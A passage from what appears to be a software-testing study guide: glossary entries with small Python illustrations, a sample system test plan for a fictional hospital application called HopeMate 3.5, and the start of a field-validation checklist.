actions management might take to alter either the risk’s likelihood
or impact.
Integration Testing This test begins after two or more programs or application
components have been successfully unit tested. It is conducted by
the development team to validate the technical quality or design of
the application. It is the first level of testing which formally
integrates a set of programs that communicate among themselves
via messages or files (a client and its server(s), a string of batch
programs, or a set of online modules within a dialogue or
conversation.)
Invalid Input Test data that lays outside the domain of the function the program
represents.
ISO 29119 ISO 29119 is a set of standards for software testing that can be
used within any software development life cycle or organization.
Iterative Model The project is divided into small parts allowing the development
team to demonstrate results earlier on in the process and obtain
valuable feedback from system users.
Life Cycle Testing The process of verifying the consistency, completeness, and
correctness of software at each stage of the development life cycle.
Mean – A value derived by adding several quantities and dividing the sum by the number of these quantities.
Metric-Based Test Data Generation – The process of generating test sets for structural testing based on use of complexity or coverage metrics.
Model Animation Model animation verifies that early models can handle the various
types of events found in production data. This is verified by
“running” actual production transactions through the models as if
they were operational systems.
Optimum Point of Testing – The point where the value received from testing no longer exceeds the cost of testing.
Pareto Analysis The Pareto Principle states that only a “vital few” factors are
responsible for producing most of the problems. This principle can
be applied to risk analysis to the extent that a great majority of
problems (80%) are produced by a few causes (20%). If we correct
these few key causes, we will have a greater probability of
success.
Pareto Charts A special type of bar chart to view the causes of a problem in order
of severity: largest to smallest based on the 80/20 premise.
Passive Risk Passive Risk is that which is inherent in inaction. For example, the
choice not to update an existing product to compete with others in
the marketplace.
Path Expressions A sequence of edges from the program graph that represents a
path through the program.
Path Testing A test method satisfying the coverage criteria that each logical path
through the program be tested. Often, paths through the program
are grouped into a finite set of classes and one path from each
class is tested.
Performance Test Validates that both the online response time and batch run times
meet the defined performance requirements.
Phase (or Stage) Containment – A method of control put in place within each stage of the development process to promote error identification and resolution so that defects are not propagated downstream to subsequent stages of the development process.
Plan Define your objective and determine the conditions and methods
required to achieve your objective. Clearly describe the goals and
policies needed to achieve the objective at this stage. (Plan-Do-
Check-Act)
Plan-Do-Check-Act Model – One of the best known process improvement models is the Plan-Do-Check-Act model for continuous process improvement.
Post Conditions A list of conditions, if any, which will be true after the Use Case
finished successfully.
Pre-Conditions A list of conditions, if any, which must be met before the Use Case
can be properly executed.
Prevention Costs Resources required to prevent defects and to do the job right the
first time. These normally require up-front expenditures for benefits
that will be derived later. This category includes money spent on
establishing methods and procedures, training workers, acquiring
tools, and planning for quality. Prevention resources are spent
before the product is actually built.
Procedure Describe how work must be done and how methods, tools,
techniques, and people are applied to perform a process. There
are Do procedures and Check procedures. Procedures indicate the
“best way” to meet standards.
Process Risk Process risk is the activities such as planning, resourcing, tracking,
quality assurance, and configuration management.
Product The output of a process: the work product. There are three useful
classes of products: Manufactured Products (standard and
custom), Administrative/Information Products (invoices, letters,
etc.), and Service Products (physical, intellectual, physiological,
and psychological). A statement of requirements defines products;
one or more people working in a process produce them.
Productivity The ratio of the output of a process to the input, usually measured
in the same units. It is frequently useful to compare the value
added to a product by a process, to the value of the input
resources required (using fair market values for both input and
output).
Quality Control (QC) – The process by which product quality is compared with applicable standards, and the action taken when nonconformance is detected. Its focus is defect detection and removal. This is a line function; that is, the performance of these tasks is the responsibility of the people working within the process.
Reader (Inspections) – Must understand the material, paraphrases the material during the inspection, and sets the inspection pace.
Recovery Test Evaluates the contingency features built into the application for
handling interruptions and for returning to specific points in the
application processing cycle, including checkpoints, backups,
restores, and restarts. This test also assures that disaster recovery
is possible.
Residual Risk Residual Risk is the risk that remains after management responds
to the identified risks.
Reuse Model The premise behind the Reuse Model is that systems should be
built using existing components, as opposed to custom-building
new components. The Reuse Model is clearly suited to Object-
Risk Acceptance Risk Acceptance is the amount of risk exposure that is acceptable
to the project and the company and can be either active or passive.
Risk Appetite Risk Appetite defines the amount of loss management is willing to
accept for a given risk.
Risk Avoidance Risk avoidance is a strategy for risk resolution to eliminate the risk
altogether. Avoidance is a strategy to use when a lose-lose
situation is likely.
Risk Event Risk Event is a future occurrence that may affect the project for
better or worse. The positive aspect is that these events will help
you identify opportunities for improvement while the negative
aspect will be the realization of threats and losses.
Risk Exposure Risk Exposure is the measure that determines the probability of
likelihood of the event times the loss that could occur.
Risk Identification Risk Identification is a method used to find risks before they
become problems. The risk identification process transforms
issues and concerns about a project into tangible risks, which can
be described and measured.
Risk Mitigation Risk Mitigation is the action taken to reduce threats and/or
vulnerabilities.
Risk Reserves A risk reserve is a strategy to use contingency funds and built-in
schedule slack when uncertainty exists in cost or time.
Risk Transfer Risk transfer is a strategy to shift the risk to another person, group,
or organization and is used when another group has control.
Sad Path A path through the application which does not arrive at the desired
result.
Scope of Testing The scope of testing is the extensiveness of the test process. A
narrow scope may be limited to determining whether or not the
software specifications were correctly implemented. The scope
broadens as more responsibilities are assigned to software testers.
Selective Regression Testing – The process of testing only those sections of a program where the tester's analysis indicates programming changes have taken place and the related components.
Soft Skills Soft skills are defined as the personal attributes which enable an
individual to interact effectively and harmoniously with other
people.
Software Item Source code, object code, job control code, control data, or a
collection of these.
Software Quality Factors – Software quality factors are attributes of the software that, if they are wanted and not present, pose a risk to the success of the software and thus constitute a business risk.
Software Quality Gaps – The first gap is the producer gap. It is the gap between what was specified to be delivered, meaning the documented requirements and internal IT standards, and what was actually delivered. The second gap is between what the producer actually delivered compared to what the customer expected.
Special Causes of Variation – Variation not typically present in the process. They occur because of special or unique circumstances.
Special Test Data Test data based on input values that are likely to require special
handling by the program.
Spiral Model – Model designed to include the best features from the Waterfall and Prototyping models, and introduces a new component: risk assessment.
Standardizer Must know IT standards & procedures, ensures standards are met
and procedures are followed, meets with project leader/manager,
and ensures entrance criteria are met (product is ready for review).
Statement of Requirements – The exhaustive list of requirements that define a product. Note that the statement of requirements should document requirements proposed and rejected (including the reason for the rejection) during the requirement determination process.
Statement Testing – A test method that executes each statement in a program at least once during program testing.
Statistical Process Control – The use of statistical techniques and tools to measure an ongoing process for change or stability.
Structural System Testing – Structural System Testing is designed to verify that the developed system and programs work. The objective is to ensure that the product designed is structurally sound and will function correctly.
Structural Testing A testing method in which the test data is derived solely from the
program structure.
System Boundary Diagram – A system boundary diagram depicts the interfaces between the software under test and the individuals, systems, and other interfaces. These interfaces or external agents are referred to as "actors." The purpose of the system boundary diagram is to establish the scope of the system and to identify the actors (i.e., the interfaces) that need to be developed. (Use Cases)
System Test The entire system is tested to verify that all functional, information, structural and quality requirements have been met. A predetermined combination of tests is designed that, when executed successfully, satisfies management that the system meets specifications. System testing verifies the functional quality of the system in addition to all external interfaces, manual procedures, restart and recovery, and human-computer interfaces. It also verifies that interfaces between the application and the open environment work correctly, that JCL functions correctly, and that the application functions appropriately with the Database Management System.
Test Case Generator A software tool that creates test cases from requirements specifications. Cases generated this way ensure that 100% of the functionality specified is tested.
Test Case Specification An individual test condition, executed as part of a larger test that contributes to the test’s objectives. Test cases document the input, expected results, and execution conditions of a given test item. Test cases are broken down into one or more detailed test scripts and test data conditions for execution.
Test Cycle Test cases are grouped into manageable (and schedulable) units
called test cycles. Grouping is according to the relation of
objectives to one another, timing requirements, and on the best
way to expedite defect detection during the testing event. Often
test cycles are linked with execution of a batch process.
Test Data Data points required to test most applications; one set of test data
to confirm the expected results (data along the happy path), a
second set to verify the software behaves correctly for invalid input
data (alternate paths or sad path), and finally data intended to force
incorrect processing (e.g., crash the application).
Test Data Management A defined strategy for the development, use, maintenance, and, ultimately, destruction of test data.
Test Data Set Set of input elements used in the testing process.
Test Design Specification A document that specifies the details of the test approach for a software feature or a combination of features and identifies the associated tests.
Test Driver A program that directs the execution of another program against a
collection of test data sets. Usually, the test driver also records and
organizes the output generated as the tests are run.
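A minimal sketch of the idea in Python (the add_tax routine and its data sets are hypothetical):

# Hypothetical unit under test.
def add_tax(amount, rate):
    return round(amount * (1 + rate), 2)

# Test data sets: (inputs, expected output).
test_data_sets = [
    ((100.00, 0.05), 105.00),
    ((0.00, 0.05), 0.00),
    ((19.99, 0.10), 21.99),
]

# The driver executes the unit against each data set and records the outcome.
results = []
for args, expected in test_data_sets:
    actual = add_tax(*args)
    results.append({"inputs": args, "expected": expected,
                    "actual": actual, "passed": actual == expected})

for r in results:
    print(r)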
Test Incident Report A document describing any event during the testing process that requires investigation.
Test Item Transmittal Report A document that identifies test items and includes status and location information.
Test Labs Test labs are another manifestation of the test environment which
is more typically viewed as a brick and mortar environment
(designated, separated, physical location).
Test Point Analysis (TPA) Calculates test effort based on size (derived from FPA), strategy (as defined by system components and quality characteristics to be tested and the coverage of testing), and productivity (the amount of time needed to perform a given volume of testing work).
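As a deliberately simplified arithmetic illustration of the size-times-strategy-times-productivity idea only (this is not the published TPA formula, and all numbers are hypothetical):

# Hypothetical inputs: size from function point analysis, a strategy factor
# reflecting the quality characteristics and coverage to be tested, and a
# productivity rate in hours of test work per test point.
size_in_function_points = 400
strategy_factor = 1.2            # broader coverage / more quality characteristics
productivity_hours_per_point = 1.4

test_points = size_in_function_points * strategy_factor
estimated_test_hours = test_points * productivity_hours_per_point
print(f"test points: {test_points:.0f}, estimated effort: {estimated_test_hours:.0f} hours")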
Test Scripts A specific order of actions that should be performed during a test
session. The script also contains expected results. Test scripts may
be manually prepared using paper forms, or may be automated
using capture/playback tools or other kinds of automated scripting
tools.
Test Stubs Simulates a called routine so that the calling routine’s functions can
be tested. A test harness (or driver) simulates a calling component
or external environment, providing input to the called routine,
initiating the routine, and evaluating or displaying output returned.
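A minimal Python sketch of a stub standing in for a not-yet-available routine, together with a simple driver exercising the caller; all names are hypothetical:

# Stub: stands in for a pricing service called by the unit under test.
def get_price_stub(product_id):
    # Returns canned data so the calling routine can be tested in isolation.
    return {"A1": 10.0, "B2": 25.0}.get(product_id, 0.0)

# Unit under test: depends on a "get_price" routine supplied by its caller.
def order_total(product_ids, get_price):
    return sum(get_price(pid) for pid in product_ids)

# Driver: supplies input, initiates the routine, and checks the returned output.
if __name__ == "__main__":
    total = order_total(["A1", "B2", "B2"], get_price_stub)
    assert total == 60.0, f"unexpected total: {total}"
    print("order_total behaved as expected with the stubbed pricing service")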
Test Suite Manager A tool that allows testers to organize test scripts by function or other grouping.
Test Summary Report A document that describes testing activities and results and evaluates the corresponding test items.
Testing Process Assessment Thoughtful analysis of testing process results, and then taking corrective action on the identified weaknesses.
Thread Testing This test technique, which is often used during early integration
testing, demonstrates key functional capabilities by testing a string
of units that accomplish a specific function in the application.
Timeliness This refers to whether the data was reported in sufficient time to
impact the decisions needed to manage effectively.
Tools Any resources that are not consumed in converting the input into
the deliverable.
Top-Down Begin testing from the top of the module hierarchy and work down
to the bottom using interim stubs to simulate lower interfacing
modules or programs. Modules are added in descending
hierarchical order.
Tracing A process that follows the flow of computer logic at execution time.
Tracing demonstrates the sequence of instructions or a path
followed in accomplishing a given task. The two main types of trace
are tracing instructions in computer programs as they are
executed, or tracing the path through a database to locate
predetermined pieces of information.
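For the first kind of trace, Python’s standard sys.settrace hook can make the executed path visible; a minimal sketch follows, with a hypothetical routine being traced:

import sys

def traced(frame, event, arg):
    # Print each line event so the executed path through the code is visible.
    if event == "line":
        print(f"executing {frame.f_code.co_name} line {frame.f_lineno}")
    return traced

def absolute(n):          # hypothetical routine whose path we want to follow
    if n < 0:
        n = -n
    return n

sys.settrace(traced)
absolute(-3)
sys.settrace(None)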
Use Case Points (UCP) A derivative of the Use Cases method is the estimation technique known as Use Case Points. Use Case Points are similar to Function Points and are used to estimate the size of a project.
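A hedged sketch of the commonly cited UCP arithmetic (unadjusted actor and use case weights scaled by technical and environmental factors); the counts and factor values below are hypothetical:

# Hypothetical counts combined with the commonly cited weighting scheme.
unadjusted_actor_weight = 2 * 1 + 3 * 2 + 4 * 3        # simple, average, complex actors
unadjusted_use_case_weight = 5 * 5 + 4 * 10 + 2 * 15   # simple, average, complex use cases

technical_complexity_factor = 1.05   # assumed, derived from the technical factors
environmental_factor = 0.95          # assumed, derived from the environmental factors

ucp = (unadjusted_actor_weight + unadjusted_use_case_weight) \
      * technical_complexity_factor * environmental_factor
print(f"Use Case Points: {ucp:.1f}")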
Usability Test The purpose of this event is to review the application user interface
and other human factors of the application with the people who will
be using the application. This is to ensure that the design (layout
and sequence, etc.) enables the business functions to be executed
as easily and intuitively as possible. This review includes assuring
that the user interface adheres to documented User Interface
standards, and should be conducted early in the design stage of
development. Ideally, an application prototype is used to walk the
client group through various business scenarios, although paper
copies of screens, windows, menus, and reports can be used.
User Acceptance Testing User Acceptance Testing (UAT) is conducted to ensure that the system meets the needs of the organization and the end user/customer. It validates that the system will work as intended by the user in the real world, and is based on real world business scenarios, not system requirements. Essentially, this test validates that the right system was built.
User Story A short description of something that a customer will do when they
use an application (software system). The User Story is focused on
the value or result a customer would receive from doing whatever it
is the application does.
Values (Sociology) The ideals, customs, institutions, etc., of a society toward which the people have an affective regard. These values may be positive, as cleanliness, freedom, or education, or negative, as cruelty, crime, or blasphemy. Any object or quality desired as a means or as an end in itself.
White-Box Testing A testing technique that assumes that the path of the logic in a program unit or component is known. White-box testing usually consists of testing paths, branch by branch, to produce predictable results. This technique is usually used during tests executed by the development team, such as Unit or Component testing.
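A minimal sketch (the shipping_cost routine is hypothetical) in which test cases are chosen branch by branch from the known logic rather than from the specification alone:

# Hypothetical unit whose internal logic is known to the tester.
def shipping_cost(weight_kg, express):
    cost = 5.0 if weight_kg <= 1.0 else 9.0   # branch on weight
    if express:                                # branch on delivery option
        cost += 4.0
    return cost

# One test per branch outcome, chosen from the code paths themselves.
assert shipping_cost(0.5, False) == 5.0    # light, standard
assert shipping_cost(2.0, False) == 9.0    # heavy, standard
assert shipping_cost(0.5, True) == 9.0     # light, express
assert shipping_cost(2.0, True) == 13.0    # heavy, express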
Wideband Delphi A method for the controlled exchange of information within a group.
It provides a formal, structured procedure for the exchange of
opinion, which means that it can be used for estimating.
B
Test Plan Example
HOPE MATE VERSION 3.5
SYSTEM TEST PLAN
CHICAGO HOPE DEPARTMENT OF INFORMATION TECHNOLOGY (DOIT)
Document Control
Document ID: HopeMate_V35_TEST_PLAN          Version: 0.2
Document Name: HopeMate Version 3.5 System Test Plan
Originator: M. Jones                         Status: DRAFT
Creation/Approval Information
Activity          Name          Signature          Date
Created By:       M. Jones
Reviewed By:
Approved By:
Abstract
Distribution
Test Manager Test Team Leader
Quality Manager Test Team Members
QA Group Project Manager 1
Projects Office Project Manager 2
History
Version Modified By Date Description
0.1 M. Jones 04/11/xx Draft
0.2 M. Jones 04/13/xx Minor Corrections
0.3     M. Jones    04/22/xx    Post Review by Test Manager
0.4     M. Jones    05/04/xx    Post Review by Projects Office
Table of Contents
3. TEST STRATEGY....................................................................................................13
3.1. OVERALL STRATEGY.........................................................................................13
3.2. PROPOSED SOFTWARE “DROPS” SCHEDULE...............................................13
3.3. TESTING PROCESS ..............................................................................................14
3.4 INSPECTING RESULTS ........................................................................................14
3.5. SYSTEM TESTING................................................................................................15
3.5.1 Test Environment Pre-Test Criteria...................................................................15
3.5.2 Resumption Criteria ...........................................................................................15
3.6. EXIT CRITERIA.....................................................................................................15
3.7. DAILY TESTING STRATEGY .............................................................................15
3.8 TEST CASES OVERVIEW.....................................................................................16
3.9. SYSTEM TESTING CYCLES ...............................................................................16
7. SIGNOFF.....................................................................................................................24
1. General Information
1.1. Definitions:
Testing Software is operating the software under controlled conditions, to (1) ver-
ify that it behaves “as specified”; (2) to detect errors, and (3) to check that what has
been specified is what the user actually wanted.
Unit testing – the most ‘micro’ scale of testing; to test particular functions or code
modules. Typically done by the programmer and not by testers, as it requires
detailed knowledge of the internal program design and code. (see ‘White Box’
testing)
Load testing – testing an application under heavy loads, such as testing of a web
System under a range of loads to determine at what point the system’s response
time degrades or fails.
Stress testing – term often used interchangeably with ‘load’ and ‘performance’
testing. Also used to describe such tests as system functional testing while under
unusually heavy loads, heavy repetition of certain actions or inputs, input of large
numerical values, large complex queries to a database system, etc.
Performance testing – term often used interchangeably with ‘stress’ and ‘load’
testing. Ideally ‘performance’ testing (and any other ‘type’ of testing) is defined in
requirements documentation or QA or Test Plans.
Security testing – testing how well the system protects against unauthorized inter-
nal or external access, wilful damage, etc; may require sophisticated testing tech-
niques.
Black box testing is testing the application without any specific knowledge of
internal design or code. Tests are based on requirements and functionality,
whereby a specific input produces an output (result), and the output is checked
against a pre-specified expected result.
Soak Testing is testing the stability and ‘uptime’ of the integrated software appli-
cation.
1.2 References
1.2.1 Document Map:
This section contains the document Map of the HopeMate 3.5 Project System Test documen-
tation.
Reference          Location / Link          Originator / Owner
List key contributors to this document. These may include clients, developers, QA, configuration managers, test analysts.
Role          Name
Name          Dept.          Phone          Skills          Time Commitment          Utilized How
A dedicated, separate test environment is required for System Testing. This environment will
consist of the hardware and software components.
The environment that will be used is the MAIN test environment - http://11.22.33.44/
Software Version
Windows x 2nd Release & JVM Update
Windows XX Server Service Pack x
Internet Explorer x.03
Chrome x.01
Safari x.7
FireFox x.61
Outlook 20xx 20xx
Microsoft Office 20xx 20xx Professional
Ghost -
System Commander Deluxe
1.7 Schedule
The purpose of the document is to describe the approach to be used by Chicago Hope DOIT
for testing the HopeMate 3.5 upgrade, the exact scope of which will be specified in section
2.3.
This document is a draft description, and as such is required to be reviewed before being
accepted.
The Test Specification is a separate document which follows on from this System Test Plan.
The Test Specification document contains detailed test cases and automated test scripts to be
applied, the data to be processed, the automated testing coverage & scripts, and the expected
results.
The objectives will be achieved by defining, reviewing and executing detailed test cases, in
which specified steps will be taken to test the software, the results of which will be compared
against pre-specified expected results to evaluate whether the test was successful. This can
only happen by working directly with the business groups to define their requirements from
the system.
2.3.1 Inclusions
The scope of the Chicago Hope DOIT testing consists of System Testing, as defined in Sec-
tion 1: Definitions, of the HopeMate Project components only.
The contents of this release, which this test plan will cover, are as follows:
Detailed descriptions of the scope of each function will be described in section 2.4.
2.3.2. Exclusions
When the scope of the Test Plan has been agreed and signed off, no further items will be
considered for inclusion in this release, except:
1) Where there is the express permission and agreement of the Chicago Hope DOIT Sys-
tem Test Manager and the Test Team Leader; and
2) Where the changes/inclusions will not require significant effort on behalf of the test
team (i.e. requiring extra preparation - new test cases etc.) and will not adversely affect
the test schedule; or
3) The Chicago Hope DOIT System Test Manager explicitly agrees to accept any impact
on the test schedule resulting from the changes/inclusions.
4) System testing means black-box testing - this means that testing will not include PL/
SQL validation.
• Severity A Errors since the code cut was taken (4th April) until the start of system test
(8th May).
• Usability Testing (UT), is the responsibility of Chicago Hope xx Department.
• There will be no testing other than specified in the Test Specification document.
• No Hardware testing will be performed.
• Testing of the application on Linux is outside the scope of this plan.
• Testing of the application on Unix, including Solaris is outside the scope of this plan.
• Testing of the application on Windows XP Pro is outside the scope of this plan.
• Security Testing is outside the scope of this plan.
• Any other test configuration other than those specified in the test configurations docu-
ment will not be tested.
• System Testing
• Management of User Acceptance Testing
• Error Reporting and tracking
• Progress Reporting
• Post Test Analysis
The Access Management upgrade system testing comprises system testing of the four main
application sections:
• Basic Registration
• Enterprise Registration
• Interface and Conversion Tools
• Location Management
1) Defect fixes applied by J.S. Smith as specified in J.S. Smith’s document "Access Man-
agement Final Status".
2) Enhancements as specified in XYZsys’ “HopeMate 3.5 Feature List”.
2.4.2. Ambulatory
Notes:
• Chicago Hope DOIT will initially test using sample files provided by XYZsys, and
then liaise with XYZsys and Chicago Hope xx Department for further testing.
• Chicago Hope DOIT will check file formats against the Technical Specification v1.03.
Note - Stress Testing & Performance criteria have not been specified for the Emergency
Department, thus performance/stress testing cannot, and will not, be performed by Chicago
Hope DOIT as part of the HopeMate 3.5 System Test.
2.4.5. Infrastructure
The HopeMate 3.5 Infrastructure system testing comprises system testing of the security/
application access. See section 2.4.6 for details:
2.4.6. Portal/Mobility/SHM
The HopeMate 3.5 Security system testing comprises testing of the two main internal applica-
tions:
• Secure Health Messages (SHM)
• Security Application Access (Biometric Authentication)
1. Defect fixes applied by J.S. Smith as specified in J.S. Smith’s document "Security
Final Status".
2. Performance Enhancements as specified in J.S. Smith’s documents "Biometric
Enhancements Notes" and "Final Status".
3. Test Strategy
The testing approach is largely determined by the nature of the delivery of the various soft-
ware components that comprise the HopeMate 3.5 upgrade. This approach consists of incre-
mental releases, “drops”, in which the later release contains additional functionality.
In order for the software to be verified by the Xth of month Y, the software is required to be of
good quality, must be delivered on time, and must include the scheduled deliverables.
Additionally, in order for adequate regression testing to take place, all the functions must be
fully fixed prior to the next software “drop”.
To verify that each ‘drop’ contains the required deliverables, a series of pre-tests (per build
tests) shall be performed upon each release. The aim of this is twofold – firstly to verify that
the software is of “testable” quality, and secondly to verify that the application has not been
adversely affected by the implementation of the additional functionality. [See Section 3.5 for
details of the pre-tests.]
The main thrust of the approach is to intensively test the front end in the first releases, discov-
ering the majority of errors in this period. With the majority of these errors fixed, end-to-end
testing will be performed to prove total system processing in the later Releases.
System retest of outstanding errors and related regression testing will be performed on an
ongoing basis.
When all serious errors are fixed, an additional set of test cases will be performed in the final
release to ensure the system works in an integrated manner. It is intended that the testing in the
later releases be the final proving of the system as a single application, and not testing of indi-
vidual functions. There should be no class A or B errors outstanding prior to the start of final
Release testing.
The testing will be performed in a stand alone test environment that will be as close as possi-
ble to the customer environment (live system). This means that the system will be running in
as complete a manner as possible during all system testing activities.
Chicago Hope DOIT plans to begin testing the HopeMate 3.5 application on Monday the 10th
of month Y, 200x; testing is scheduled to last until the 3rd of month Z, 200x.
All system test cases and automated test scripts will be developed from the functional specifi-
cation, requirements definition, real world cases, and transaction type categories.
Most testing will take a black box approach, in that each test case will contain specified
inputs, which will produce specified expected outputs.
Although the initial testing will be focused on individual objects (e.g. Emergency Depart-
ment), the main bulk of the testing will be end-to-end testing, where the system will be tested
in full.
A series of simple tests will be performed for the test environment pre-test. In order for the
software to be accepted into test, these test cases should be completed successfully. Note -
these tests are not intended to perform in-depth testing of the software.
In the event that system testing is suspended resumption criteria will be specified and testing
will not re-commence until the software reaches these criteria.
The Exit Criteria detailed below must be achieved before the Phase 1 software can be
recommended for promotion to User Acceptance status. Furthermore, it is recommended that
there be a minimum of 2 days’ effort of Final Regression testing AFTER the final fix/change
has been retested.
• All High Priority errors from System Test must be fixed and tested.
• If any medium or low-priority errors are outstanding, the implementation risk must be
signed off as acceptable by the Design Team.
"Day 1"
Input data through the front end applications
Files will be verified to ensure they have correct test data
Run Day 1 cgi-bin & perl scripts
Check Outputs
Check Log files
"Day 2"
Validation & Check off via front-end applications
Files will be verified to ensure they have correct test data
Run Day 2 cgi-bin & perl scripts
Check Outputs
Check Log files
"Day 3"
Validation & Check off via front-end applications
Files will be verified to ensure they have correct test data
Unvalidated & Insecure Items Processing
Run cgi-bin & perl scripts Day 1 & 2
Check Outputs
Check Log files
The software will be tested, and the test cases will be designed, under the following functional
areas:
SECTION CATEGORY
1. Build Tests
2. System pre-tests
3. System installation tests
4. GUI Validation tests
5. System Functionality tests
6. Error Regression tests
7. Full Regression Cycle
Testing Cycle
1. Build Tests
2. Installation Tests
3. System Pre-Tests
4. Testing of new functionality
5. Retest of fixed Defects
6. Regression testing of unchanged functionality
4. Management Procedures
All errors and suspected errors found during testing will be input by each tester to the Chicago
Hope DOIT MS Access Error tracking system.
The Defects will be recorded against specific builds and products, and will include a one line
summary description, a detailed description and a hyperlink to a screenshot (if appropriate).
The error tracking system will be managed (logged, updated and reported) by Chicago Hope
DOIT.
Any critical problems likely to affect the end date for testing will be reported immediately to
the Test Manager and hence the Quality Manager.
Daily metrics will be generated, detailing the testing progress that day. The report will include
Defect classification, status and summary description.
During System Test, discrepancies will be recorded as they are detected by the testers. These
discrepancies will be input into the Chicago Hope DOIT Defect Database with the status
“Open”.
Daily an “Error Review Team” will meet to review and prioritise the errors that were raised,
and either assign, defer, or close them as appropriate. Error assignment shall be via email.
This team will consist of the following representatives:
Overview of test status flow: (Note - Engineering status flow not reflected - Assigned & Work
in Progress errors are with the development team, and the engineering status is kept separate.
The DOIT Test Team will then revisit the Defect when it exits the engineering status and
re-test it.)
Open => Assigned => Work in Progress => Fixed to be Confirmed => CLOSED + reason for
closing
The Error status changes as follows: initially Open, Error Review Team sets Assigned, Tech
Team leads sets the value for "Assigned To" (i.e. the developer who will fix it) and when
Defect is being fixed the developer sets it to Work in Progress, then sets it to "Fixed to be
Confirmed" when fix is ready. Note - Only the testers can set the error status to closed. These
changes can only be made in the Error Management system according to your access rights.
Closed has a set of reason values - e.g. Fixed & Retested; Not an Error; Duplicate; Change
Request; 3rd Party error.
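The status flow described above can be pictured informally as a small state machine; the sketch below is illustrative only (the real workflow lives in the MS Access error tracking system) and shows just the transitions named in this plan:

# Allowed defect status transitions as described above (illustrative sketch only).
ALLOWED_TRANSITIONS = {
    "Open": {"Assigned"},
    "Assigned": {"Work in Progress"},
    "Work in Progress": {"Fixed to be Confirmed"},
    "Fixed to be Confirmed": {"Closed", "Open"},   # closed if the retest passes, reopened if not
}

def move(defect, new_status):
    if new_status not in ALLOWED_TRANSITIONS.get(defect["status"], set()):
        raise ValueError(f"illegal transition {defect['status']} -> {new_status}")
    defect["status"] = new_status
    return defect

defect = {"id": 101, "status": "Open"}
for status in ("Assigned", "Work in Progress", "Fixed to be Confirmed", "Closed"):
    move(defect, status)
print(defect)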
Errors, which are agreed as valid, will be categorised as follows by the Error Review Team :
• Category A - Serious errors that prevent System test of a particular function continu-
ing or serious data type error
• Category B - Serious or missing data related errors that will not prevent implementa-
tion.
• Category C - Minor errors that do not prevent or hinder functionality.
1. The Test Lead will refer any major error/anomaly to either the Development Team
Leader or a designated representative on the development team, as well as raising a
formal error record. J.S. Smith will also be immediately informed of any Defects that
delay testing.
2. All Defects raised will be entered into the Defect Database, which will contain all
relevant data.
3. These errors will be logged on the day they occur with a status of "OPEN".
4. A daily "Error Review Team" will meet to review and prioritise the discrepancies that
were raised, and will assign the Defects to the appropriate parties for fixing. The
assignments will be made automatically via email by the Error Management System.
5. The database should be updated by the relevant person (i.e. developer, tester, etc.) with
the status of all errors should the status of the error change - e.g. Assigned, Work in
Progress, Fixed to be Confirmed, Closed.
6. Errors will remain in an "Open" state until they are "Assigned" to the responsible
parties; they will remain "Assigned" until the status of the error changes to "Work In
Progress", then set to "Fixed to be Confirmed" when a fix is ready or "Open" if not
fixed.
7. Once a number of errors have been fixed and the software is ready for another release
into the test environment, the contents of the new release (e.g. the numbers of the
Defect fixes included) will be passed to the Test Manager.
8. Once the error has been re-tested and proven to be fixed, the status will be changed to
"Closed" (if it is fixed) or "Not Fixed" (if it is not fixed). The regression test details will
also be filled in, specifying the date re-tested etc.
The purpose of the Error Review meeting is to ensure the maximum efficiency of the develop-
ment and system testing teams for the release of the new software through close co-operation
of all involved parties.
Note: Release content and timescale must be co-ordinated with the Development Manager
and System Test Manager, and must satisfy the agreed Build Handover procedures. This also
applies to any production fixes implemented - the handover has to specify the content of the
release, including any such fixes.
Progress reports will be distributed to the Project Meeting, Development Manager and Quality
Manager. The progress report will detail:
• Test Plans
• Test Progress to date
• Test execution summary
• List of problems opened
• Plans of next test activities to be performed
• Any testing issues/risks which have been identified
For each set of test cases executed, the following results shall be maintained...
• Test Identifier, and Error identifier if the test failed
• Result - Passed, Failed, Not Executable, For Retest
• Test Log
• Date of execution
• Signature of tester
Once a new build of software is delivered into Test, errors which have been resolved by the
Development Engineers will be validated. Any discrepancies will be entered/re-entered into
the error tracking system and reported back to the Development Team.
Builds will be handed off to System Test, as described in point 4.3.4.
This procedure will be repeated until the exit criteria are satisfied.
The test procedures and guidelines to be followed for this project will be detailed as follows:
• A specific test directory has been setup, which will contain the test plan, all test
cases, the error tracking database and any other relevant documentation.
The location of this directory is: \\Server\Folder\QA\SystemTesting
The following table lists the test documents which will be produced as part of the System
testing of the software, along with a brief description of the contents of each document.
DOCUMENTATION                DESCRIPTION
Test Plan (this document)    Describes the overall test approach for the project, phases, objectives etc. to be taken for testing the software, and Control documentation.
Test Specification           Describes the test environment - hardware & software; the test machine configurations to be used; and provides a detailed specification of the tests to be carried out.
Test Logs                    Results of test cases.
DOIT Defect Database         Contains the Defect database used for tracking the Defects reported during system test.
Test Report                  Post testing review & analysis.
Metrics                      Daily, Weekly & Summary totals of Errors raised during System Test.
Table 5-1: System Test Documentation Suite
There will be several formal review points before and during system test, including the review
of this document. This is a vital element in achieving a quality product.
The following risks and dependencies could severely impact the testing, resulting in
incomplete or inadequate testing of the software or adversely affecting the release date:
6.1. Risks
DETAIL RESPONSIBLE
Out of date/inaccurate requirements definition/functional
specification(s)
Lack of unit testing
Problems relating to Code merge
Test Coverage limitations (OS/Browser matrix)
6.2. Dependencies
All functionality has to be fully tested prior to the Xth of month Y. That means that the close
of business on the Xth of month Y is the latest time in which a test build can be accepted for
final regression testing if the testing is to be complete on the Zrd of month Z.
This means that all Defects must have been detected and fixed by close of business on the Xth
of month Y, leaving 3 days to do the final regression test.
7. Signoff
This document must be formally approved before System Test can commence. The following
people will be required to sign off (see Document Control at beginning of Test Plan):
GROUP
Chicago Hope DOIT Quality Manager
Project Manager1
Business Owner
C
Test Transaction Types
Checklists
The checklists found in appendix C are referenced as part of Skill Category 7, section 7.1.3,
Defining Test Conditions from Test Transaction Types.
RESPONSE
# Item
Yes No N/A Comments
1. Have all codes been validated?
2. Can fields be properly updated?
3. Is there adequate size in the field for
accumulation of totals?
4. Can the field be properly initialized?
5. If there are restrictions on the contents
of the field, are those restrictions
validated?
6. Are rules established for identifying and
processing invalid field data?
a. If no, develop this data for the
error-handling transaction type.
b. If yes, have test conditions
been prepared to validate the
specification processing for
invalid field data?
7. Have a wide range of normal valid
processing values been included in the
test conditions?
8. For numerical fields, have the upper
and lower values been tested?
9. For numerical fields, has a zero value
been tested?
10. For numerical fields, has a negative test
condition been prepared?
11. For alphabetical fields, has a blank
condition been prepared?
12. For an alphabetical/alphanumeric field,
has a test condition longer than the field
length been prepared? (The purpose is
to check truncation processing.)
13. Have you verified from the data
dictionary printout that all valid
conditions have been tested?
14. Have you reviewed systems
specifications to determine that all valid
